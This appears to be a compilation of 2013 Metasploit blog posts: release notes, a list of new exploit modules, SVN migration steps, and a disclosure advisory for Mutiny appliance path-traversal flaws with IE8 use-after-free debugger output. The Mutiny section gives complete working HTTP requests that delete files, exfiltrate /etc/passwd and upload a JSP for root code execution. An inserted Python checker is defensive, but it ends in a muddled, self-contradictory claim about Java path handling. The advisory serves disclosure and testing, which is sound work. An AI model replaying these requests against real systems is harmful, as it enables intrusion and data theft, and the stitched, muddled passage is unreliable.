Meta-Sploit
Weekly Update: 4.6.1, ColdFusion Exploit, and SVN Lockdown
This week's update bumps the patch version of Metasploit to 4.6.1 (for installed versions of Metasploit). The major change here is the ability to install Metasploit on Windows 8 and Windows Server 2012. That meant we had to fiddle with the installer and a few of Metasploit Pro's dependencies to get that all working correctly, and that led to skipping last week's release so we could be sure all the moving parts lined up correctly.
This release also fixes a few minor issues in Metasploit Pro that affected a handful of users -- you can read up on what exactly has changed in the release notes. As usual, it's a little bigger than you might expect from your typical update, given the changes in the installer code, so give it a couple extra minutes to download and do its update thing.
Intern Found!
If you've been watching this space, you'll know that we've been on the prowl for a summer intern. Welp, the search is over -- we've managed to pick up a well-qualified college student who has a strong background in both IT ops and exploit dev. If you have Pull Requests in the metasploit-framework backlog, or aging bugs in the Redmine Issue Tracker, then you should expect to meet him soon as he validates your pulls and bugs and gets your stuff back on track (or mercilessly axed).
Of course, this sort of backlog validation doesn't have to land in a paid intern's lap. If you're looking to beef up your resume, know a thing or two about IT security and Ruby, and are handy with VMware or Vagrant, you are more than welcome to throw in as well. We can always use extra validation inputs to our bugs and PR's. Even if you're not here in the Mazes of Metasploit, fixing bugs and getting your name attached to Metasploit commits is a pretty decent reference all by itself, paid or not.
SVN is Still Mostly Dead
This week we've locked up our SVN server at http://www.metasploit.com/svn with a pretty unguessable username and password. This is to discourage people from following the piles of pre-2011 documentation that's out there. The SVN lockdown is described at http://r-7.co/MSF-SVN in more detail, but the moral of the story is, don't even try to guess the password, and don't try to use your e-mail password or GitHub password or anything like that. The whole point of this new behavior is to merely transmit the instructions to move to Git in the WWW-Authenticate header.
New Modules
We've a fairly huge bucket full of exploits and auxiliary modules this week. Sixteen total, mostly around our 2013 theme of home access points and SAP installations. We're also shipping Juan's 1Day exploit for Mutiny appliances this week, as well as an exe dropper for SSH sessions from Spencer McIntyre and Brandon Knight.
Oh, and did you hear about the Linode compromise? Part of the incident centered around recent ColdFusion bugs. Now, I'm sure ColdFusion is a delightful language to work in, and if you're a CFM artiste, you probably have a ball every day working on your codebase. That said, it's not a super popular language here in the 21st Century. This usually means that you're stuck with legacy-flavored security bugs, like the directory traversal vulnerability exercised by Hack The Planet and ported to Metasploit by Wei @_sinn3r Chen.
- D-Link DIR615h OS Command Injection by juan vazquez and Michael Messner exploits OSVDB-90174
- Linksys WRT160nv2 apply.cgi Remote Command Injection by juan vazquez and Michael Messner exploits OSVDB-90093
- Mutiny 5 Arbitrary File Upload by juan vazquez exploits CVE-2013-0136
- Kloxo Local Privilege Escalation by juan vazquez and HTP
- SAP Management Console OSExecute Payload Execution by juan vazquez and Chris John Riley
- SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution by nmonkee
- SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution by nmonkee
- SSH User Code Execution by Brandon Knight and Spencer McIntyre exploits CVE-1999-0502
- ERS Viewer 2011 ERS File Handling Buffer Overflow by juan vazquez and Parvez Anwar exploits CVE-2013-0726
- DLink DSL 320B Password Extractor by Michael Messner exploits OSVDB-93013
- Mutiny 5 Arbitrary File Read and Delete by juan vazquez exploits CVE-2013-0136
- SAP SOAP EPS_DELETE_FILE File Deletion by Alexey Sintsov and nmonkee exploits OSVDB-74780
- ColdFusion 'password.properties' Hash Extraction by sinn3r and HTP exploits OSVDB-93114
- CouchDB Enum Utility by espreto
- SAP CTC Service Verb Tampering User Management by Alexandr Polyakov and nmonkee
- SAP SMB Relay Abuse by Alexey Tyurin and nmonkee
- SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure by nmonkee
Availability
If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.
For additional details on what's changed and what's current, please see Brandont's most excellent release notes.
Git Clone Metasploit; Don't SVN Checkout
TL;DR: Please stop using SVN with
svn co https://www.metasploit.com/svn/framework3/trunk
and start using the GitHub repo with
git clone git://github.com/rapid7/metasploit-framework
As of today, a few of you may notice that an attempt to update Metasploit Framework over SVN (instead of git or msfupdate) results in an authentication request. If you try to SVN checkout on Windows, using TortoiseSVN, you will see a pop up much like this:
For command line people, if you try to 'svn co' or 'svn up' your checkout of Metasploit Framework you will read:
$ svn up
Updating '.':
Authentication realm: <https://www.metasploit.com:443> =[ MSF must be updated via GitHub
or a more recent msfupdate. See http://r-7.co/MSF-SVN for more ]=
Password for 'yourname':
Please don't try any passwords you think you know. We've locked up SVN and we're using the authentication realm to communicate the correct update path to humans in a way readable by human eyeballs. The password prompt is incidental. If you've read this far, you might wonder why we're doing this.
On November 10, 2011, we moved our source control to GitHub, and we've been bugging people to use git instead of SVN ever since. However, the Internet exists in an eternal present tense. There are thousands and thousands of documents, blog posts, books, and articles on 'Getting Started with Metasploit' in practically every human language spread all over the world, both on and offline, some of which we control, most of which we don't. If you don't believe me, just search for "svn co" metasploit.
Because of this, we're not ready to turn off SVN completely -- throwing a 404 error on an update will just generate more (than usual) complaints on Twitter, IRC, and mailing lists about 'svn co' and 'svn up' being broken. Those complaints are still happening today, so it's clear that some people are still stuck with way-out-of-date documentation. Hopefully, those folks will read the instructions in the HTTP authentication realm, since that's about the only way we can communicate with SVN-only clients.
If you are still on SVN, then converting to GitHub works like this:
- Don't try to use a password; if by some miracle you happen to guess a correct one, your prize is that you get some messed up, out of date SVN-sourced code. (:
- Delete your SVN checkout of Metasploit: rm -rf $HOME/metasploit (or the real path to your checkout).
- Clone the latest from GitHub: git clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit (or the path where you want the clone).
- Go to your new Metasploit checkout, and run msfupdate: cd metasploit; ./msfupdate (this will get the bundle of Ruby gems together for you).
If you can't use the git:// URI handler, then use https:// instead. It's somewhat slower, but still a million times better than SVN. If bundler complains about gem dependencies, then check to make sure that you have a reasonable version of Ruby -- 1.9.3 is ideal. 1.8.x is out. 2.0.0 should be okay, but it's not vetted for prime time yet.
That's it. Everything will work as before -- your custom modules that you stashed in $HOME/.msf4/modules will be picked up, you will be gleefully tracking Metasploit's bleeding edge source branch, and now, your checkouts won't take hours and crash out on you.
If you use Metasploit Community, Metasploit Express, or Metasploit Pro, then basically none of this applies to you -- msfupdate was converted in Metasploit 4.5 to use weekly updates, which means you're getting the benefit of both Rapid7 QA and community testing without bothering with git or SVN.
Below, you can find a smattering of documents and posts regarding msfupdate and tracking the Framework source, which will provide more detail on various aspects of the continuous state of Metasploit development. If your setup is not the simple case described here, you will probably find what you need in one of these documents:
Metasploit Development Environment · (metasploit-framework wiki)
Metasploit Moves from SVN to Git/GitHub
New 1day Exploits: Mutiny Vulnerabilities
Back in March we published an exploit module for Mutiny Remote Code Execution. Mutiny "is a self-contained appliance for monitoring network-attached devices such as servers, switches, routers and printers. It has been designed to be simple to use, being aimed at the person who is more interested in the actual data gathered rather than the science of gathering the data." (Source: Mutiny User Guide). That module abused CVE-2012-3001, a command injection issue in the frontend application which allowed any authenticated user with access to the admin interface to execute OS commands with root privileges. While developing that exploit, we took a look at the latest version of the Mutiny FrontEnd available at that time (5.0-1.07) and found other issues, grouped under CVE-2013-0136, which have the plus of being exploitable from any authenticated role.
Vulnerabilities Summary
The Mutiny Appliance provides a Web Frontend, where users can configure the system and monitor the data collected by the appliance. The Frontend provides four access roles: “Super Admin”, “Administrator”, “Engineer” and “View only”. All the roles allow the user to access the “Documents” section, where multiple weaknesses have been detected that allow:
- To delete any file from the remote file system with root privileges.
- To copy and move files in the remote file system with root privileges, which also allows downloading/retrieving these files.
- To upload arbitrary files to the remote file system and ultimately execute arbitrary code with root privileges.
Disclosure Timeline
- 2013-03-08: Initial discovery by Juan Vazquez, Metasploit Researcher
- 2013-03-09: Draft advisory and Metasploit module written
- 2013-03-11: Initial disclosure to the vendor, Mutiny Technology
- 2013-03-12: Follow-up with vendor
- 2013-03-27: Disclosure to CERT/CC
- 2013-05-14: Version 5.0-1.11 tested and not vulnerable to the disclosed exploitation (1)
- 2013-05-15: Public Disclosure
- 2013-05-15: Metasploit exploit module published
(1) Prior to public disclosure, the latest available version was tested and the disclosed exploitation techniques no longer work. The tested version was "5.0-1.11 (EAGLe) - (02-05-13)". Since the vendor neither notified us about the patch nor asked us to review it, we cannot assure that the current patch is complete and secure, nor do we have details about the revisions between 5.0-1.07 and 5.0-1.11, which could be vulnerable. We encourage you to use the current Metasploit modules in order to test your Mutiny installation for the disclosed vulnerabilities.
Technical Analysis
The Web Frontend of Mutiny is provided in part by a Java Web Application. This frontend provides a "Documents" section for authenticated users of any role:
The Documents functions are in part provided by a servlet named "EditDocument". This servlet provides several "Documents" functions such as upload, copy, move and delete documents (decompiled, with the decompiler's goto labels left in place):
protected void doPost(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse)
    throws ServletException, IOException
. . .
    s = httpservletrequest.getParameter("operation");
    if(ServletFileUpload.isMultipartContent(httpservletrequest))
        s = "UPLOAD";
. . .
    if(!s.equals("NEW")) goto _L2; else goto _L1
. . .
    if(!s.equals("RENAME")) goto _L5; else goto _L4
. . .
    if(!s.equals("DELETE")) goto _L7; else goto _L6
. . .
    if(!s.equals("CUT") && !s.equals("COPY")) goto _L9; else goto _L8
- The UPLOAD operation can be abused via a Directory Traversal vulnerability in the “uploadPath” parameter to upload arbitrary files and contents to the remote filesystem with root privileges:
if(s.equals("UPLOAD")) {
    ServletFileUpload servletfileupload = new ServletFileUpload(new DiskFileItemFactory());
    List list = null;
    try {
        list = servletfileupload.parseRequest(httpservletrequest);
    } catch(FileUploadException fileuploadexception) {
        fileuploadexception.printStackTrace();
    }
    String s6 = null;
    FileItem fileitem = null;
    Iterator iterator = list.iterator();
    do {
        if(!iterator.hasNext())
            break;
        FileItem fileitem1 = (FileItem)iterator.next();
        if(fileitem1.isFormField() && fileitem1.getFieldName().equals("uploadPath"))
            s6 = fileitem1.getString(); // User controlled
        else if(!fileitem1.isFormField() && fileitem1.getFieldName().equals("uploadFile"))
            fileitem = fileitem1; // User controlled
    } while(true);
    if(s6.length() == 0) {
        System.out.println("Error: uploadPath not set.");
        s6 = "/documents";
    }
    if(fileitem == null) {
        System.out.println("Error: uploadFile not set.");
    } else {
        File file5 = new File(DocumentUtils.root, s6); // Directory Traversal
        File file7 = new File(file5, fileitem.getName());
        file7.getParentFile().mkdirs();
        file7 = DocumentUtils.getUniqueFile(file7, false);
        file7.createNewFile();
        try {
            fileitem.write(file7); // Write file
            if(file7.exists() && file7.length() == fileitem.getSize())
                flag = true;
            if(debug)
                System.out.println((new StringBuilder()).append(s).append(": ").append(file7.getPath()).toString());
        } catch(Exception exception) {
            exception.printStackTrace();
        }
    }
}
- The DELETE operation is also affected by a directory traversal vulnerability in the “paths[]” parameter, which allows deleting arbitrary files with root privileges:
_L5:
    if(!s.equals("DELETE")) goto _L7; else goto _L6
_L6:
    String as1[] = httpservletrequest.getParameterValues("paths[]"); // User controlled
    String as2[] = as1;
    int j = as2.length;
    for(int k = 0; k < j; k++) {
        String s7 = as2[k];
        File file6 = new File(DocumentUtils.root, s7); // Directory Traversal
        if(!isValid(file6))
            return;
        if(file6.isDirectory())
            FileUtils.deleteDirectory(file6); // Delete directory
        else
            flag = file6.delete(); // Delete file
        if(debug)
            System.out.println((new StringBuilder()).append("DELETE: ").append(file6.getPath()).toString());
    }
- The CUT and COPY operations are also affected by directory traversal vulnerabilities in the “paths[]” and “newPath” parameters, which allow copying and moving files around the remote file system with root privileges:
    if(!s.equals("CUT") && !s.equals("COPY")) goto _L9; else goto _L8
_L8:
    File file2;
    String as3[];
    String s4 = httpservletrequest.getParameter("newPath");
    file2 = new File(DocumentUtils.root, s4); // Directory Traversal in newPath
    as3 = httpservletrequest.getParameterValues("paths[]");
    if(as3 == null) goto _L3; else goto _L10
_L10:
    String as4[];
    int l;
    int i1;
    as4 = as3;
    l = as4.length;
    i1 = 0;
_L11:
    File file8;
    File file9;
    FileInputStream fileinputstream;
    FileOutputStream fileoutputstream;
    if(i1 >= l)
        break; /* Loop/switch isn't completed */
    String s8 = as4[i1];
    file8 = new File(DocumentUtils.root, s8); // Directory traversal in paths[]
    if(!isValid(file8))
        return;
    file9 = new File(file2, file8.getName()); // Directory traversal in newPath
    file9 = DocumentUtils.getUniqueFile(file9, file8.isDirectory());
    if(debug)
        System.out.println((new StringBuilder()).append(s).append(": ").append(file9.getPath()).toString());
    file9.getParentFile().mkdirs();
    if(s.equals("CUT")) {
        flag = file8.renameTo(file9); // CUT operation affected by directory traversals
        break MISSING_BLOCK_LABEL_881;
    }
    if(!s.equals("COPY"))
        break MISSING_BLOCK_LABEL_881;
    if(!file9.exists())
        file9.createNewFile();
    fileinputstream = null;
    fileoutputstream = null;
    fileinputstream = new FileInputStream(file8); // COPY operation affected by directory traversals
    fileoutputstream = new FileOutputStream(file9);
    byte abyte0[] = new byte[4096];
    int j1;
    while((j1 = fileinputstream.read(abyte0)) > 0)
        fileoutputstream.write(abyte0, 0, j1);
    flag = true;
    fileinputstream.close();
    fileoutputstream.close();
    break MISSING_BLOCK_LABEL_881;
    Exception exception1;
    exception1;
    System.err.println(exception1.getMessage());
    fileinputstream.close();
    fileoutputstream.close();
    break MISSING_BLOCK_LABEL_881;
    Exception exception2;
    exception2;
    fileinputstream.close();
    fileoutputstream.close();
    throw exception2;
    i1++;
    if(true) goto _L11; else goto _L3
Exploitation
After examining the “doPost()” function of the “EditDocument” servlet, the following requests were built to abuse these operations.
DELETE operation
The next request allows deleting an arbitrary file from the filesystem:
POST /interface/EditDocument HTTP/1.1
Host: 192.168.1.177
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
Content-Length: 76
Accept: */*
Origin: http://192.168.1.177
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.177/interface/documents.jsp
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=611F495538F214B351A860D32273DB89; JSESSIONIDSSO=EF00467D61F67EA2CE86010762914E4D
Connection: keep-alive
Proxy-Connection: keep-alive

operation=DELETE&paths%5B%5D=../../../../test.msf
In this case, “/test.msf” is deleted from the remote file system. The 4-level traversal is needed because “DocumentUtils.root” points by default to “/var/MUTINY/upload/documents” on the Linux-based appliance.
The response to the request informs if the file deletion has been successful:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=10
Content-Type: application/json;charset=UTF-8
Content-Length: 16
Date: Fri, 08 Mar 2013 02:16:18 GMT

{"success":true}
COPY operation
The copy operation allows copying arbitrary files in the remote file system with root privileges. By copying arbitrary files to the default web root in the appliance it’s possible to retrieve arbitrary files.
The next request allows copying the “/etc/passwd” file to the web root for mobile devices, by default located at “/usr/jakarta/tomcat/webapps/ROOT/m” on the Mutiny Linux-based appliance:
POST /interface/EditDocument HTTP/1.1
Host: 192.168.1.177
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
Content-Length: 111
Accept: */*
Origin: http://192.168.1.177
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.177/interface/documents.jsp
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=14CE95F1ED56321B4B226DF669D691C0; JSESSIONIDSSO=FA98603965548C3FB1F67BC5121A75DC
Connection: keep-alive
Proxy-Connection: keep-alive

operation=COPY&paths%5B%5D=../../../../etc/passwd%00.txt&newPath=../../../../usr/jakarta/tomcat/webapps/ROOT/m/
The response to the request informs if the file copy has been successful:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=10
Content-Type: application/json;charset=UTF-8
Content-Length: 16
Date: Fri, 08 Mar 2013 04:11:17 GMT

{"success":true}
By accessing http://appliance/m/passwd it is possible to retrieve the remote file:
UPLOAD operation
The upload operation allows uploading an arbitrary file to the file system with root privileges. By uploading a JSP file to the “/usr/jakarta/tomcat/webapps/ROOT/m” default location, arbitrary Java code can be executed with root privileges by later invoking the JSP file via the web interface. The next request allows uploading JSP code to the "/usr/jakarta/tomcat/webapps/ROOT/m/msf.jsp” location:
POST /interface/EditDocument HTTP/1.1
Host: 192.168.1.177
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
Content-Length: 491
Accept: */*
Origin: http://192.168.1.177
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPxNcR2XfK8d5gMeU
Referer: http://192.168.1.177/interface/documents.jsp
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=611F495538F214B351A860D32273DB89; JSESSIONIDSSO=EF00467D61F67EA2CE86010762914E4D
Connection: keep-alive
Proxy-Connection: keep-alive

------WebKitFormBoundaryPxNcR2XfK8d5gMeU
Content-Disposition: form-data; name="uploadFile"; filename="msf.jsp"
Content-Type: application/octet-stream
<html>
<head><title>Metasploit Test Page</title></head>
<body>
<font size="10"><%="Metasploit Test" %></font>
</body>
</html>
------WebKitFormBoundaryPxNcR2XfK8d5gMeU
Content-Disposition: form-data; name="uploadPath"
../../../../usr/jakarta/tomcat/webapps/ROOT/m
------WebKitFormBoundaryPxNcR2XfK8d5gMeU--
The response to the request informs if the file upload has been successful:
By accessing http://appliance/m/msf.jsp it is possible to execute the uploaded JSP code:
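The three requests above all succeed for the same reason: every path parameter is handed to new File(DocumentUtils.root, value) without checking that the result still lies below the document root. As an added example (not part of the advisory and not Mutiny's code), the following Python models the containment check the servlet lacks and runs it over the exact parameter values from the DELETE, COPY and UPLOAD requests. DocumentUtils.root is modelled by DOCUMENT_ROOT (the default path given in the advisory), requests are modelled as dicts of already URL-decoded form fields, and BENIGN_REQUEST is a constructed in-root path for contrast; none of these names come from the product.

```python
"""Added example (not from the advisory or Mutiny): a path-containment check
of the kind the EditDocument servlet lacks, exercised against the advisory's
own DELETE, COPY and UPLOAD parameter values.
"""
import posixpath

# Default document root on the Linux-based appliance, as stated in the advisory.
DOCUMENT_ROOT = "/var/MUTINY/upload/documents"

# Path parameters from the advisory's three requests, URL-decoded
# (%5B%5D -> "[]", %00 -> NUL byte).
ADVISORY_REQUESTS = [
    {"operation": "DELETE", "paths[]": ["../../../../test.msf"]},
    {"operation": "COPY",
     "paths[]": ["../../../../etc/passwd\x00.txt"],
     "newPath": "../../../../usr/jakarta/tomcat/webapps/ROOT/m/"},
    {"operation": "UPLOAD",
     "uploadPath": "../../../../usr/jakarta/tomcat/webapps/ROOT/m"},
]

# Constructed for comparison: a document path that stays inside the root.
BENIGN_REQUEST = {"operation": "DELETE", "paths[]": ["reports/2013/old.txt"]}


def resolve_under_root(root, user_path):
    """Return the normalised absolute path of user_path inside root, or None.

    None means the value must be rejected: it is empty, carries a NUL byte,
    is absolute, or normalises to something outside root. This is the check
    that `new File(DocumentUtils.root, s)` in the decompiled code never does.
    Normalisation here is lexical (no filesystem access), so symlinks inside
    root are not followed; a real deployment would canonicalise first
    (in Java, File.getCanonicalPath()) and then apply the same containment test.
    """
    if not user_path or "\x00" in user_path:
        return None
    if user_path.startswith("/"):
        # posixpath.join discards root when the second argument is absolute.
        return None
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    # Containment: candidate must be root itself or a descendant of root.
    # The trailing "/" stops a sibling such as ".../documents2" from passing.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def path_parameters(request):
    """Yield (name, value) for every parameter the servlet turns into a File."""
    for value in request.get("paths[]", []):
        yield "paths[]", value
    for name in ("newPath", "uploadPath"):
        if name in request:
            yield name, request[name]


def check_request(request, root=DOCUMENT_ROOT):
    """Return [(operation, parameter, value), ...] for every path parameter
    that would escape root. An empty list means the request is contained."""
    findings = []
    for name, value in path_parameters(request):
        if resolve_under_root(root, value) is None:
            findings.append((request["operation"], name, value))
    return findings


def levels_to_filesystem_root(root):
    """Number of '../' components needed to climb from root to '/'. For the
    advisory's default root this is 4, which is why each request uses
    exactly four '../' segments."""
    return len([part for part in posixpath.normpath(root).split("/") if part])


if __name__ == "__main__":
    print("DocumentUtils.root is %d levels deep" % levels_to_filesystem_root(DOCUMENT_ROOT))
    for request in ADVISORY_REQUESTS + [BENIGN_REQUEST]:
        findings = check_request(request)
        print("REJECT" if findings else "allow", request["operation"], findings)
```

Run stand-alone, the script rejects all three advisory requests (the COPY request twice, once for paths[] and once for newPath) and allows the constructed in-root path. The same containment test is what a reviewer should look for around every File constructed from request data in the servlet, including the UPLOAD branch's fallback to "/documents", which is itself absolute and therefore ignores DocumentUtils.root under Java's File(parent, child) semantics only if treated as a child path; the check above rejects absolute values outright.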
Metasploit modules
In order to assist vulnerability testing, two modules for the Metasploit Framework have been developed.
mutiny_frontend_read_delete
The “mutiny_frontend_read_delete” is an auxiliary module which abuses the DELETE and COPY operations to retrieve or delete arbitrary files from the remote system:
- Reading /etc/passwd
- Deleting remote files
mutiny_frontend_upload
The "mutiny_frontend_upload" is an exploit module which abuses the UPLOAD operation to upload arbitrary JSP code and an arbitrary payload embedded in an ELF file; the latter is executed through invocation of the JSP stager:
Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.
Department of Labor IE 0-day Exploit (CVE-2013-1347) Now Available at Metasploit
Recently, the U.S. Department of Labor website was compromised and had been serving malicious code, capable of detecting and disabling some antivirus products such as Avira, F-Secure, Kaspersky, AVG, Sophos, etc. It would also attack Internet Explorer 8 users with a 0-day exploit. The Metasploit vulnerability research community was particularly interested in the exploit part, so that's what we'd like to talk about in this blog. Understanding how the evolving browser security landscape operates is key to formulating defense strategies, after all.
First off, according to Microsoft's advisory, only Internet Explorer 8 is vulnerable to this exploit, and we verified that with a fully patched Windows 7 with IE8. If you are looking for an excuse to upgrade to something more recent, the following image demonstrates IE8's weakness:
Some people say this is CVE-2012-4792 (a patched vulnerability); we beg to differ. CVE-2012-4792 is a cbutton use-after-free, but the DoL exploit doesn't use this object at all (Exodus has an excellent writeup about that vulnerability). Instead, a mshtml!CGenericElement::`vtable' is created while appending a datalist element:
Allocating 0x4C bytes from InsertElementInternal: 0x0563cfb0
...
0:008> !heap -p -a poi(0x0563cfb0)
    address 06a99fc8 found in
    _DPH_HEAP_ROOT @ 151000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 5087390:          6a99fc8               38 -          6a99000             2000
          mshtml!CGenericElement::`vftable'
    7c918f01 ntdll!RtlAllocateHeap+0x00000e64
    635db42e mshtml!CGenericElement::CreateElement+0x00000018
    635a67f5 mshtml!CreateElement+0x00000043
    637917c0 mshtml!CMarkup::CreateElement+0x000002de
    63791929 mshtml!CDocument::CreateElementHelper+0x00000052
    637918a2 mshtml!CDocument::createElement+0x00000021
    635d3820 mshtml!Method_IDispatchpp_BSTR+0x000000d1
    636430c9 mshtml!CBase::ContextInvokeEx+0x000005d1
    63643595 mshtml!CBase::InvokeEx+0x00000025
    63643832 mshtml!DispatchInvokeCollection+0x0000014b
    635e1cdc mshtml!CDocument::InvokeEx+0x000000f1
    63642f30 mshtml!CBase::VersionedInvokeEx+0x00000020
    63642eec mshtml!PlainInvokeEx+0x000000ea
    633a6d37 jscript!IDispatchExInvokeEx2+0x000000f8
    633a6c75 jscript!IDispatchExInvokeEx+0x0000006a
    633a9cfe jscript!InvokeDispatchEx+0x00000098
And freed during garbage collection:
0:008> !heap -p -a poi(0x0563cfb0)
    address 06a99fc8 found in
    _DPH_HEAP_ROOT @ 151000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    5087390:          6a99000             2000
    7c927553 ntdll!RtlFreeHeap+0x000000f9
    636b52c6 mshtml!CGenericElement::`vector deleting destructor'+0x0000003d
    63628a50 mshtml!CBase::SubRelease+0x00000022
    63640d1b mshtml!CElement::PrivateRelease+0x00000029
    6363d0ae mshtml!PlainRelease+0x00000025
    63663c03 mshtml!PlainTrackerRelease+0x00000014
    633a10b4 jscript!VAR::Clear+0x0000005c
    6339fb4a jscript!GcContext::Reclaim+0x000000ab
    6339fd33 jscript!GcContext::CollectCore+0x00000113
    63405594 jscript!JsCollectGarbage+0x0000001d
    633a92f7 jscript!NameTbl::InvokeInternal+0x00000137
    633a6650 jscript!VAR::InvokeByDispID+0x0000017c
    633a9c0b jscript!CScriptRuntime::Run+0x00002989
    633a5ab0 jscript!ScrFncObj::CallWithFrameOnStack+0x000000ff
    633a59f7 jscript!ScrFncObj::Call+0x0000008f
    633a5743 jscript!CSession::Execute+0x00000175
Even though the CGenericElement vftable is freed, the reference is still kept:
0:008> dc 0x0563cfb0; .echo; dc poi(0x0563cfb0)
0563cfb0  06a99fc8 00000000 ffff0075 ffffffff  ........u.......
0563cfc0  00000071 00000000 00000000 00000000  q...............
0563cfd0  00000000 0563cfd8 00000152 00000001  ......c.R.......
0563cfe0  00000000 00000000 0563cfc0 00000000  ..........c.....
0563cff0  00000010 00000000 00000000 d0d0d0d0  ................
0563d000  ???????? ???????? ???????? ???????? ????????????????
0563d010  ???????? ???????? ???????? ???????? ????????????????
0563d020  ???????? ???????? ???????? ???????? ????????????????

06a99fc8  ???????? ???????? ???????? ???????? ????????????????
06a99fd8  ???????? ???????? ???????? ???????? ????????????????
06a99fe8  ???????? ???????? ???????? ???????? ????????????????
06a99ff8  ???????? ???????? ???????? ???????? ????????????????
06a9a008  ???????? ???????? ???????? ???????? ????????????????
06a9a018  ???????? ???????? ???????? ???????? ????????????????
06a9a028  ???????? ???????? ???????? ???????? ????????????????
06a9a038  ???????? ???????? ???????? ???????? ????????????????
And of course, this invalid reference ends up with a crash when used by mshtml!CElement::Doc():
0:008> g
(5f4.2c0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=63aae200 ebx=0563cfb0 ecx=06a99fc8 edx=00000000 esi=037cf0b8 edi=00000000
eip=6363fcc4 esp=037cf08c ebp=037cf0a4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CElement::Doc:
6363fcc4 8b01            mov     eax,dword ptr [ecx]  ds:0023:06a99fc8=????????
As of now, we are not aware of any patch from Microsoft specifically for IE8, but we will be updating this blog as soon as we hear something. If you're a current IE8 user, then please consider the following workarounds:
- For newer Windows, upgrade to Internet Explorer 9 or 10.
- For Windows XP users, please use other browsers such as Google Chrome or Mozilla Firefox.
- If for some reason you must use Internet Explorer 8, please use EMET. Or, you can also try setting IE's security zone to High, and customize your Active Scripting settings.
Note that while Microsoft's advisory also suggests setting IE8's Internet security zones to 'High' for ActiveX controls, this, by itself, will not mitigate the issue -- the exploitation technique used here does not leverage ActiveX controls at all. So, while that is generally good advice, it will not help in this case.
If you'd like to try out this Metasploit module to better validate your defenses, please feel free to download Metasploit here. If you already have Metasploit Framework, you may just use the msfupdate utility to receive this module. For Metasploit Pro users, you will see this module in the upcoming update.
Special thanks to: EMH
Timeline
- May 3rd - Microsoft advisory 2847140, no patch yet.
- May 5th - Metasploit releases ie_cgenericelement_uaf exploit
- May 8th - Microsoft releases "fix-it"
- May 14th - Microsoft releases MS13-038 patch
Metasploit's 10th Anniversary: Laptop Decal Design Competition
When I wrote up the Metasploit Hits 1000 Exploits post back in December, I had to perform a little open source forensic work to get something resembling an accurate history of the Metasploit project -- after all, it's difficult for me to remember a time on the Internet without Metasploit. I traced the first mention of 1.0 back to this mailing list post in 2003. You know what that means, right? This year marks the 10th year of the Metasploit Framework!
One of the ways we're marking this anniversary is with something very much in keeping with our history. You may remember our T-shirt design contest back in 2011, won by Danny Chrastil and his elegant hexified Metasploit logo (with a cowsay back), and our Metasploit tattoo design competition. We had such a good experience with these contests that we're commemorating this auspicious anniversary with a new Metasploit laptop decal design contest... starting today!
The winning design will be selected on Friday, May 31, 2013.
You can enter by posting your design to this 99Designs project and tweeting a link to your design with the hashtag #metasploitdecal.
Once all designs are in, we'll select the finalists and ask the Metasploit Community to select the final winner.
Like last time, the winner will have the satisfaction of having their design plastered on hackers' gear (yes, we're doing laptop decals!). In addition, the triumphant designer will win a grand payout on 99Designs for permission to use the work.
So, think about what you want to see on your laptop, on public or private property that you have gained prior, written authorization to tag, and maybe even tattooed on some Rapid7 employee's person, and tweet your designs!
Happy Birthday Metasploit!
Weekly Update: WordPress Total Cache and Mimikatz
Someone once described PHP as a "web API for remote code execution," and it's true that PHP is definitely web programming without guardrails. This week's security news was dominated by a RCE vulnerability in a pair of wildly popular WordPress plugins, W3 Total Cache and WP Super Cache, which are written in (wait for it) PHP. Regular Metasploit contributors HD Moore, Juan Vazquez, and FireFart leaped into action to write up a Metasploit module to achieve code execution on WordPress-powered sites that use these plugins.
What does this mean for network defenders and auditors? Well, for many small businesses, and some larger ones, a WordPress-powered site may be the one touch point that these businesses have with their customers. Suffering a website defacement can damage these businesses' brands and reputations. However, there's no law that says a PHP-based attack must result in a website defacement. A persistent attacker can leverage this vulnerability to perform all sorts of mischief, such as compromising back-end database credentials, dumping stored user password hashes, or combining this attack with a local privilege escalation exploit to gain control over the entire server. This can all be done without leaving obvious signs of compromise on the website proper.
So, if you are responsible for a WordPress site, it would behoove you to use Metasploit to determine if you are, in fact, vulnerable to these kinds of exploits, and to see for yourself how far an exploit can go.
Mimikatz
